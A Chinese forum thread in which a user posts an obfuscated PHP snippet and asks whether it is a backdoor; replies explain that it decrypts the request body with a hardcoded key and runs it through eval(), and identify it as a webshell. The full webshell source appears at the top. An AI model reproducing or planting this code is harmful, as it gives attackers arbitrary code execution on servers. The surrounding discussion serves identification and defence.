<?php @error_reporting(0);$i='f'.'f'.'2'.'9'.'2'.'6'.'b'.'a'.'0'.'c'.'a'.'5'.'4'.'e'.'c'.'a';$_SESSION['k']=$i;session_write_close();$j=file_get_contents(“php://input”);if(!extension_loaded('openssl')){$k=”base64_”.”decode”;$j=$k($j.””);for($l=0;$l<strlen($j);$l++){$j[$l]=$j[$l]^$i[$l+1&15];}}else{$j=openssl_decrypt($j,”AES128″,$i);}$m=explode('|',$j);$n=$m[0];$o=$m[1];class C{public function __invoke($p){eval($p.””);}}@call_user_func(new C(),$o);
谁给看看这吊毛代码是不是后门
广告
1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关;
2、本站所有主题由该帖子作者发表,该帖子作者与本站享有帖子相关版权;
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和的同意;
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任;
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责;
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意;
问答板块严查恶意、辱骂、讽刺等评论,如发现此类评论轻则小黑屋,重则永久封禁!
如果发现帖子违规,用户可以点击帖子标题旁的向下箭头,选择举报内容!
如果联系请站内私信联系,禁止留下QQ,微信等联系方式否则会被系统拦截!
请登录之后再进行评论
登录
关注2
粉丝2
喜欢3
内容8
代码被混淆并以base64编码
看起来像后门。它接受来自php://input并用AES128对其进行解密。
然后,它使用分隔符“|”拆分解密的字符串。
第一部分存储在$n中,第二部分存储在$0中。
然后使用eval()执行第二部分。
代码试图通过使用类隐藏自己,然后使用call_user_func()调用该类。
该代码是一个后门,用于在服务器上执行任意代码。
123网盘,本人大部分资源都是搬运的,勿充钱购买,不解答问题
Webshell
是的
QQ:3258794818
小马